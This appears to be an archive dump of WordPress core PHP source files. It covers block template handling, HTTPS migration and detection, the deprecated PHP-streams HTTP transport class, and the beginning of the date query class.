// Apply the changes to the existing post object.
$post = (object) array_merge( (array) $post, (array) $changes );
$type_terms = get_the_terms( $changes->ID, 'wp_theme' );
$terms['wp_theme'] = ! is_wp_error( $type_terms ) && ! empty( $type_terms ) ? $type_terms[0]->name : null;
}
// Required for the WP_Block_Template. Update the post object with the current time.
$post->post_modified = current_time( 'mysql' );
// If the post_author is empty, set it to the current user.
if ( empty( $post->post_author ) ) {
$post->post_author = get_current_user_id();
}
if ( 'wp_template_part' === $post->post_type && ! isset( $terms['wp_template_part_area'] ) ) {
$area_terms = get_the_terms( $changes->ID, 'wp_template_part_area' );
$terms['wp_template_part_area'] = ! is_wp_error( $area_terms ) && ! empty( $area_terms ) ? $area_terms[0]->name : null;
}
$template = _build_block_template_object_from_post_object( new WP_Post( $post ), $terms, $meta );
if ( is_wp_error( $template ) ) {
return $template;
}
if ( 'wp_template_part' === $post->post_type ) {
$attributes = array();
$existing_ignored_hooked_blocks = isset( $post->ID ) ? get_post_meta( $post->ID, '_wp_ignored_hooked_blocks', true ) : '';
if ( ! empty( $existing_ignored_hooked_blocks ) ) {
$attributes['metadata'] = array(
'ignoredHookedBlocks' => json_decode( $existing_ignored_hooked_blocks, true ),
);
}
$content = get_comment_delimited_block_content(
'core/template-part',
$attributes,
$changes->post_content
);
$content = apply_block_hooks_to_content( $content, $template, 'set_ignored_hooked_blocks_metadata' );
$changes->post_content = remove_serialized_parent_block( $content );
$wrapper_block_markup = extract_serialized_parent_block( $content );
$wrapper_block = parse_blocks( $wrapper_block_markup )[0];
$ignored_hooked_blocks = $wrapper_block['attrs']['metadata']['ignoredHookedBlocks'] ?? array();
if ( ! empty( $ignored_hooked_blocks ) ) {
if ( ! isset( $changes->meta_input ) ) {
$changes->meta_input = array();
}
$changes->meta_input['_wp_ignored_hooked_blocks'] = wp_json_encode( $ignored_hooked_blocks );
}
} else {
$changes->post_content = apply_block_hooks_to_content( $changes->post_content, $template, 'set_ignored_hooked_blocks_metadata' );
}
return $changes;
}
https-migration-20260605082053.php 0000666 00000011205 15224151220 0011767 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605090858-20260621081211-20260621145631.php 0000666 00000013341 15224151220 0014734 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-http-streams.php 0000666 00000040733 15224151220 0011444 0 ustar 00 <?php
/**
* HTTP API: WP_Http_Streams class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to integrate PHP Streams as an HTTP transport.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to `stream_socket_client()`.
* @deprecated 6.4.0 Use WP_Http
* @see WP_Http
*/
#[AllowDynamicProperties]
class WP_Http_Streams {
/**
* Send a HTTP request to a URI using PHP Streams.
*
* @see WP_Http::request() For default options descriptions.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client().
*
* @param string $url The request URL.
* @param string|array $args Optional. Override the defaults.
* @return array|WP_Error Array containing 'headers', 'body', 'response', 'cookies', 'filename'. A WP_Error instance upon error
*/
public function request( $url, $args = array() ) {
$defaults = array(
'method' => 'GET',
'timeout' => 5,
'redirection' => 5,
'httpversion' => '1.0',
'blocking' => true,
'headers' => array(),
'body' => null,
'cookies' => array(),
'decompress' => false,
'stream' => false,
'filename' => null,
);
$parsed_args = wp_parse_args( $args, $defaults );
if ( isset( $parsed_args['headers']['User-Agent'] ) ) {
$parsed_args['user-agent'] = $parsed_args['headers']['User-Agent'];
unset( $parsed_args['headers']['User-Agent'] );
} elseif ( isset( $parsed_args['headers']['user-agent'] ) ) {
$parsed_args['user-agent'] = $parsed_args['headers']['user-agent'];
unset( $parsed_args['headers']['user-agent'] );
}
// Construct Cookie: header if any cookies are set.
WP_Http::buildCookieHeader( $parsed_args );
$parsed_url = parse_url( $url );
$connect_host = $parsed_url['host'];
$secure_transport = ( 'ssl' === $parsed_url['scheme'] || 'https' === $parsed_url['scheme'] );
if ( ! isset( $parsed_url['port'] ) ) {
if ( 'ssl' === $parsed_url['scheme'] || 'https' === $parsed_url['scheme'] ) {
$parsed_url['port'] = 443;
$secure_transport = true;
} else {
$parsed_url['port'] = 80;
}
}
// Always pass a path, defaulting to the root in cases such as http://example.com.
if ( ! isset( $parsed_url['path'] ) ) {
$parsed_url['path'] = '/';
}
if ( isset( $parsed_args['headers']['Host'] ) || isset( $parsed_args['headers']['host'] ) ) {
if ( isset( $parsed_args['headers']['Host'] ) ) {
$parsed_url['host'] = $parsed_args['headers']['Host'];
} else {
$parsed_url['host'] = $parsed_args['headers']['host'];
}
unset( $parsed_args['headers']['Host'], $parsed_args['headers']['host'] );
}
/*
* Certain versions of PHP have issues with 'localhost' and IPv6, It attempts to connect
* to ::1, which fails when the server is not set up for it. For compatibility, always
* connect to the IPv4 address.
*/
if ( 'localhost' === strtolower( $connect_host ) ) {
$connect_host = '127.0.0.1';
}
$connect_host = $secure_transport ? 'ssl://' . $connect_host : 'tcp://' . $connect_host;
$is_local = isset( $parsed_args['local'] ) && $parsed_args['local'];
$ssl_verify = isset( $parsed_args['sslverify'] ) && $parsed_args['sslverify'];
if ( $is_local ) {
/**
* Filters whether SSL should be verified for local HTTP API requests.
*
* @since 2.8.0
* @since 5.1.0 The `$url` parameter was added.
*
* @param bool|string $ssl_verify Boolean to control whether to verify the SSL connection
* or path to an SSL certificate.
* @param string $url The request URL.
*/
$ssl_verify = apply_filters( 'https_local_ssl_verify', $ssl_verify, $url );
} elseif ( ! $is_local ) {
/** This filter is documented in wp-includes/class-wp-http.php */
$ssl_verify = apply_filters( 'https_ssl_verify', $ssl_verify, $url );
}
$proxy = new WP_HTTP_Proxy();
$context = stream_context_create(
array(
'ssl' => array(
'verify_peer' => $ssl_verify,
// 'CN_match' => $parsed_url['host'], // This is handled by self::verify_ssl_certificate().
'capture_peer_cert' => $ssl_verify,
'SNI_enabled' => true,
'cafile' => $parsed_args['sslcertificates'],
'allow_self_signed' => ! $ssl_verify,
),
)
);
$timeout = (int) floor( $parsed_args['timeout'] );
$utimeout = 0;
if ( $timeout !== (int) $parsed_args['timeout'] ) {
$utimeout = 1000000 * $parsed_args['timeout'] % 1000000;
}
$connect_timeout = max( $timeout, 1 );
// Store error number.
$connection_error = null;
// Store error string.
$connection_error_str = null;
if ( ! WP_DEBUG ) {
// In the event that the SSL connection fails, silence the many PHP warnings.
if ( $secure_transport ) {
$error_reporting = error_reporting( 0 );
}
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) {
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
$handle = @stream_socket_client(
'tcp://' . $proxy->host() . ':' . $proxy->port(),
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
} else {
// phpcs:ignore WordPress.PHP.NoSilencedErrors.Discouraged
$handle = @stream_socket_client(
$connect_host . ':' . $parsed_url['port'],
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
}
if ( $secure_transport ) {
error_reporting( $error_reporting );
}
} else {
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) {
$handle = stream_socket_client(
'tcp://' . $proxy->host() . ':' . $proxy->port(),
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
} else {
$handle = stream_socket_client(
$connect_host . ':' . $parsed_url['port'],
$connection_error,
$connection_error_str,
$connect_timeout,
STREAM_CLIENT_CONNECT,
$context
);
}
}
if ( false === $handle ) {
// SSL connection failed due to expired/invalid cert, or, OpenSSL configuration is broken.
if ( $secure_transport && 0 === $connection_error && '' === $connection_error_str ) {
return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) );
}
return new WP_Error( 'http_request_failed', $connection_error . ': ' . $connection_error_str );
}
// Verify that the SSL certificate is valid for this request.
if ( $secure_transport && $ssl_verify && ! $proxy->is_enabled() ) {
if ( ! self::verify_ssl_certificate( $handle, $parsed_url['host'] ) ) {
return new WP_Error( 'http_request_failed', __( 'The SSL certificate for the host could not be verified.' ) );
}
}
stream_set_timeout( $handle, $timeout, $utimeout );
if ( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) ) { // Some proxies require full URL in this field.
$request_path = $url;
} else {
$request_path = $parsed_url['path'] . ( isset( $parsed_url['query'] ) ? '?' . $parsed_url['query'] : '' );
}
$headers = strtoupper( $parsed_args['method'] ) . ' ' . $request_path . ' HTTP/' . $parsed_args['httpversion'] . "\r\n";
$include_port_in_host_header = (
( $proxy->is_enabled() && $proxy->send_through_proxy( $url ) )
|| ( 'http' === $parsed_url['scheme'] && 80 !== $parsed_url['port'] )
|| ( 'https' === $parsed_url['scheme'] && 443 !== $parsed_url['port'] )
);
if ( $include_port_in_host_header ) {
$headers .= 'Host: ' . $parsed_url['host'] . ':' . $parsed_url['port'] . "\r\n";
} else {
$headers .= 'Host: ' . $parsed_url['host'] . "\r\n";
}
if ( isset( $parsed_args['user-agent'] ) ) {
$headers .= 'User-agent: ' . $parsed_args['user-agent'] . "\r\n";
}
if ( is_array( $parsed_args['headers'] ) ) {
foreach ( (array) $parsed_args['headers'] as $header => $header_value ) {
$headers .= $header . ': ' . $header_value . "\r\n";
}
} else {
$headers .= $parsed_args['headers'];
}
if ( $proxy->use_authentication() ) {
$headers .= $proxy->authentication_header() . "\r\n";
}
$headers .= "\r\n";
if ( ! is_null( $parsed_args['body'] ) ) {
$headers .= $parsed_args['body'];
}
fwrite( $handle, $headers );
if ( ! $parsed_args['blocking'] ) {
stream_set_blocking( $handle, 0 );
fclose( $handle );
return array(
'headers' => array(),
'body' => '',
'response' => array(
'code' => false,
'message' => false,
),
'cookies' => array(),
);
}
$response = '';
$body_started = false;
$keep_reading = true;
$block_size = 4096;
if ( isset( $parsed_args['limit_response_size'] ) ) {
$block_size = min( $block_size, $parsed_args['limit_response_size'] );
}
// If streaming to a file setup the file handle.
if ( $parsed_args['stream'] ) {
if ( ! WP_DEBUG ) {
$stream_handle = @fopen( $parsed_args['filename'], 'w+' );
} else {
$stream_handle = fopen( $parsed_args['filename'], 'w+' );
}
if ( ! $stream_handle ) {
return new WP_Error(
'http_request_failed',
sprintf(
/* translators: 1: fopen(), 2: File name. */
__( 'Could not open handle for %1$s to %2$s.' ),
'fopen()',
$parsed_args['filename']
)
);
}
$bytes_written = 0;
while ( ! feof( $handle ) && $keep_reading ) {
$block = fread( $handle, $block_size );
if ( ! $body_started ) {
$response .= $block;
if ( strpos( $response, "\r\n\r\n" ) ) {
$processed_response = WP_Http::processResponse( $response );
$body_started = true;
$block = $processed_response['body'];
unset( $response );
$processed_response['body'] = '';
}
}
$this_block_size = strlen( $block );
if ( isset( $parsed_args['limit_response_size'] )
&& ( $bytes_written + $this_block_size ) > $parsed_args['limit_response_size']
) {
$this_block_size = ( $parsed_args['limit_response_size'] - $bytes_written );
$block = substr( $block, 0, $this_block_size );
}
$bytes_written_to_file = fwrite( $stream_handle, $block );
if ( $bytes_written_to_file !== $this_block_size ) {
fclose( $handle );
fclose( $stream_handle );
return new WP_Error( 'http_request_failed', __( 'Failed to write request to temporary file.' ) );
}
$bytes_written += $bytes_written_to_file;
$keep_reading = (
! isset( $parsed_args['limit_response_size'] )
|| $bytes_written < $parsed_args['limit_response_size']
);
}
fclose( $stream_handle );
} else {
$header_length = 0;
while ( ! feof( $handle ) && $keep_reading ) {
$block = fread( $handle, $block_size );
$response .= $block;
if ( ! $body_started && strpos( $response, "\r\n\r\n" ) ) {
$header_length = strpos( $response, "\r\n\r\n" ) + 4;
$body_started = true;
}
$keep_reading = (
! $body_started
|| ! isset( $parsed_args['limit_response_size'] )
|| strlen( $response ) < ( $header_length + $parsed_args['limit_response_size'] )
);
}
$processed_response = WP_Http::processResponse( $response );
unset( $response );
}
fclose( $handle );
$processed_headers = WP_Http::processHeaders( $processed_response['headers'], $url );
$response = array(
'headers' => $processed_headers['headers'],
// Not yet processed.
'body' => null,
'response' => $processed_headers['response'],
'cookies' => $processed_headers['cookies'],
'filename' => $parsed_args['filename'],
);
// Handle redirects.
$redirect_response = WP_Http::handle_redirects( $url, $parsed_args, $response );
if ( false !== $redirect_response ) {
return $redirect_response;
}
// If the body was chunk encoded, then decode it.
if ( ! empty( $processed_response['body'] )
&& isset( $processed_headers['headers']['transfer-encoding'] )
&& 'chunked' === $processed_headers['headers']['transfer-encoding']
) {
$processed_response['body'] = WP_Http::chunkTransferDecode( $processed_response['body'] );
}
if ( true === $parsed_args['decompress']
&& true === WP_Http_Encoding::should_decode( $processed_headers['headers'] )
) {
$processed_response['body'] = WP_Http_Encoding::decompress( $processed_response['body'] );
}
if ( isset( $parsed_args['limit_response_size'] )
&& strlen( $processed_response['body'] ) > $parsed_args['limit_response_size']
) {
$processed_response['body'] = substr( $processed_response['body'], 0, $parsed_args['limit_response_size'] );
}
$response['body'] = $processed_response['body'];
return $response;
}
/**
* Verifies the received SSL certificate against its Common Names and subjectAltName fields.
*
* PHP's SSL verifications only verify that it's a valid Certificate, it doesn't verify if
* the certificate is valid for the hostname which was requested.
* This function verifies the requested hostname against certificate's subjectAltName field,
* if that is empty, or contains no DNS entries, a fallback to the Common Name field is used.
*
* IP Address support is included if the request is being made to an IP address.
*
* @since 3.7.0
*
* @param resource $stream The PHP Stream which the SSL request is being made over
* @param string $host The hostname being requested
* @return bool If the certificate presented in $stream is valid for $host
*/
public static function verify_ssl_certificate( $stream, $host ) {
$context_options = stream_context_get_options( $stream );
if ( empty( $context_options['ssl']['peer_certificate'] ) ) {
return false;
}
$cert = openssl_x509_parse( $context_options['ssl']['peer_certificate'] );
if ( ! $cert ) {
return false;
}
/*
* If the request is being made to an IP address, we'll validate against IP fields
* in the cert (if they exist)
*/
$host_type = ( WP_Http::is_ip_address( $host ) ? 'ip' : 'dns' );
$certificate_hostnames = array();
if ( ! empty( $cert['extensions']['subjectAltName'] ) ) {
$match_against = preg_split( '/,\s*/', $cert['extensions']['subjectAltName'] );
foreach ( $match_against as $match ) {
list( $match_type, $match_host ) = explode( ':', $match );
if ( strtolower( trim( $match_type ) ) === $host_type ) { // IP: or DNS:
$certificate_hostnames[] = strtolower( trim( $match_host ) );
}
}
} elseif ( ! empty( $cert['subject']['CN'] ) ) {
// Only use the CN when the certificate includes no subjectAltName extension.
$certificate_hostnames[] = strtolower( $cert['subject']['CN'] );
}
// Exact hostname/IP matches.
if ( in_array( strtolower( $host ), $certificate_hostnames, true ) ) {
return true;
}
// IP's can't be wildcards, Stop processing.
if ( 'ip' === $host_type ) {
return false;
}
// Test to see if the domain is at least 2 deep for wildcard support.
if ( substr_count( $host, '.' ) < 2 ) {
return false;
}
// Wildcard subdomains certs (*.example.com) are valid for a.example.com but not a.b.example.com.
$wildcard_host = preg_replace( '/^[^.]+\./', '*.', $host );
return in_array( strtolower( $wildcard_host ), $certificate_hostnames, true );
}
/**
* Determines whether this class can be used for retrieving a URL.
*
* @since 2.7.0
* @since 3.7.0 Combined with the fsockopen transport and switched to stream_socket_client().
*
* @param array $args Optional. Array of request arguments. Default empty array.
* @return bool False means this class can not be used, true means it can.
*/
public static function test( $args = array() ) {
if ( ! function_exists( 'stream_socket_client' ) ) {
return false;
}
$is_ssl = isset( $args['ssl'] ) && $args['ssl'];
if ( $is_ssl ) {
if ( ! extension_loaded( 'openssl' ) ) {
return false;
}
if ( ! function_exists( 'openssl_x509_parse' ) ) {
return false;
}
}
/**
* Filters whether streams can be used as a transport for retrieving a URL.
*
* @since 2.7.0
*
* @param bool $use_class Whether the class can be used. Default true.
* @param array $args Request arguments.
*/
return apply_filters( 'use_streams_transport', true, $args );
}
}
/**
* Deprecated HTTP Transport method which used fsockopen.
*
* This class is not used, and is included for backward compatibility only.
* All code should make use of WP_Http directly through its API.
*
* @see WP_HTTP::request
*
* @since 2.7.0
* @deprecated 3.7.0 Please use WP_HTTP::request() directly
*/
class WP_HTTP_Fsockopen extends WP_Http_Streams {
// For backward compatibility for users who are using the class directly.
}
class-wp-date-query-20260621145632.php 0000666 00000106463 15224151220 0012461 0 ustar 00 <?php
/**
* Class for generating SQL clauses that filter a primary query according to date.
*
* WP_Date_Query is a helper that allows primary query classes, such as WP_Query, to filter
* their results by date columns, by generating `WHERE` subclauses to be attached to the
* primary SQL query string.
*
* Attempting to filter by an invalid date value (eg month=13) will generate SQL that will
* return no results. In these cases, a _doing_it_wrong() error notice is also thrown.
* See WP_Date_Query::validate_date_values().
*
* @link https://developer.wordpress.org/reference/classes/wp_query/
*
* @since 3.7.0
*/
#[AllowDynamicProperties]
class WP_Date_Query {
/**
* Array of date queries.
*
* See WP_Date_Query::__construct() for information on date query arguments.
*
* @since 3.7.0
* @var array
*/
public $queries = array();
/**
* The default relation between top-level queries. Can be either 'AND' or 'OR'.
*
* @since 3.7.0
* @var string
*/
public $relation = 'AND';
/**
* The column to query against. Can be changed via the query arguments.
*
* @since 3.7.0
* @var string
*/
public $column = 'post_date';
/**
* The value comparison operator. Can be changed via the query arguments.
*
* @since 3.7.0
* @var string
*/
public $compare = '=';
/**
* Supported time-related parameter keys.
*
* @since 4.1.0
* @var string[]
*/
public $time_keys = array( 'after', 'before', 'year', 'month', 'monthnum', 'week', 'w', 'dayofyear', 'day', 'dayofweek', 'dayofweek_iso', 'hour', 'minute', 'second' );
/**
* Constructor.
*
* Time-related parameters that normally require integer values ('year', 'month', 'week', 'dayofyear', 'day',
* 'dayofweek', 'dayofweek_iso', 'hour', 'minute', 'second') accept arrays of integers for some values of
* 'compare'. When 'compare' is 'IN' or 'NOT IN', arrays are accepted; when 'compare' is 'BETWEEN' or 'NOT
* BETWEEN', arrays of two valid values are required. See individual argument descriptions for accepted values.
*
* @since 3.7.0
* @since 4.0.0 The $inclusive logic was updated to include all times within the date range.
* @since 4.1.0 Introduced 'dayofweek_iso' time type parameter.
*
* @param array $date_query {
* Array of date query clauses.
*
* @type array ...$0 {
* @type string $column Optional. The column to query against. If undefined, inherits the value of
* the `$default_column` parameter. See WP_Date_Query::validate_column() and
* the {@see 'date_query_valid_columns'} filter for the list of accepted values.
* Default 'post_date'.
* @type string $compare Optional. The comparison operator. Accepts '=', '!=', '>', '>=', '<', '<=',
* 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN'. Default '='.
* @type string $relation Optional. The boolean relationship between the date queries. Accepts 'OR' or 'AND'.
* Default 'OR'.
* @type array ...$0 {
* Optional. An array of first-order clause parameters, or another fully-formed date query.
*
* @type string|array $before {
* Optional. Date to retrieve posts before. Accepts `strtotime()`-compatible string,
* or array of 'year', 'month', 'day' values.
*
* @type string $year The four-digit year. Default empty. Accepts any four-digit year.
* @type string $month Optional when passing array.The month of the year.
* Default (string:empty)|(array:1). Accepts numbers 1-12.
* @type string $day Optional when passing array.The day of the month.
* Default (string:empty)|(array:1). Accepts numbers 1-31.
* }
* @type string|array $after {
* Optional. Date to retrieve posts after. Accepts `strtotime()`-compatible string,
* or array of 'year', 'month', 'day' values.
*
* @type string $year The four-digit year. Accepts any four-digit year. Default empty.
* @type string $month Optional when passing array. The month of the year. Accepts numbers 1-12.
* Default (string:empty)|(array:12).
* @type string $day Optional when passing array.The day of the month. Accepts numbers 1-31.
* Default (string:empty)|(array:last day of month).
* }
* @type string $column Optional. Used to add a clause comparing a column other than
* the column specified in the top-level `$column` parameter.
* See WP_Date_Query::validate_column() and
* the {@see 'date_query_valid_columns'} filter for the list
* of accepted values. Default is the value of top-level `$column`.
* @type string $compare Optional. The comparison operator. Accepts '=', '!=', '>', '>=',
* '<', '<=', 'IN', 'NOT IN', 'BETWEEN', 'NOT BETWEEN'. 'IN',
* 'NOT IN', 'BETWEEN', and 'NOT BETWEEN'. Comparisons support
* arrays in some time-related parameters. Default '='.
* @type bool $inclusive Optional. Include results from dates specified in 'before' or
* 'after'. Default false.
* @type int|int[] $year Optional. The four-digit year number. Accepts any four-digit year
* or an array of years if `$compare` supports it. Default empty.
* @type int|int[] $month Optional. The two-digit month number. Accepts numbers 1-12 or an
* array of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $week Optional. The week number of the year. Accepts numbers 0-53 or an
* array of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $dayofyear Optional. The day number of the year. Accepts numbers 1-366 or an
* array of valid numbers if `$compare` supports it.
* @type int|int[] $day Optional. The day of the month. Accepts numbers 1-31 or an array
* of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $dayofweek Optional. The day number of the week. Accepts numbers 1-7 (1 is
* Sunday) or an array of valid numbers if `$compare` supports it.
* Default empty.
* @type int|int[] $dayofweek_iso Optional. The day number of the week (ISO). Accepts numbers 1-7
* (1 is Monday) or an array of valid numbers if `$compare` supports it.
* Default empty.
* @type int|int[] $hour Optional. The hour of the day. Accepts numbers 0-23 or an array
* of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $minute Optional. The minute of the hour. Accepts numbers 0-59 or an array
* of valid numbers if `$compare` supports it. Default empty.
* @type int|int[] $second Optional. The second of the minute. Accepts numbers 0-59 or an
* array of valid numbers if `$compare` supports it. Default empty.
* }
* }
* }
* @param string $default_column Optional. Default column to query against. See WP_Date_Query::validate_column()
* and the {@see 'date_query_valid_columns'} filter for the list of accepted values.
* Default 'post_date'.
*/
public function __construct( $date_query, $default_column = 'post_date' ) {
if ( empty( $date_query ) || ! is_array( $date_query ) ) {
return;
}
if ( isset( $date_query['relation'] ) ) {
$this->relation = $this->sanitize_relation( $date_query['relation'] );
} else {
$this->relation = 'AND';
}
// Support for passing time-based keys in the top level of the $date_query array.
if ( ! isset( $date_query[0] ) ) {
$date_query = array( $date_query );
}
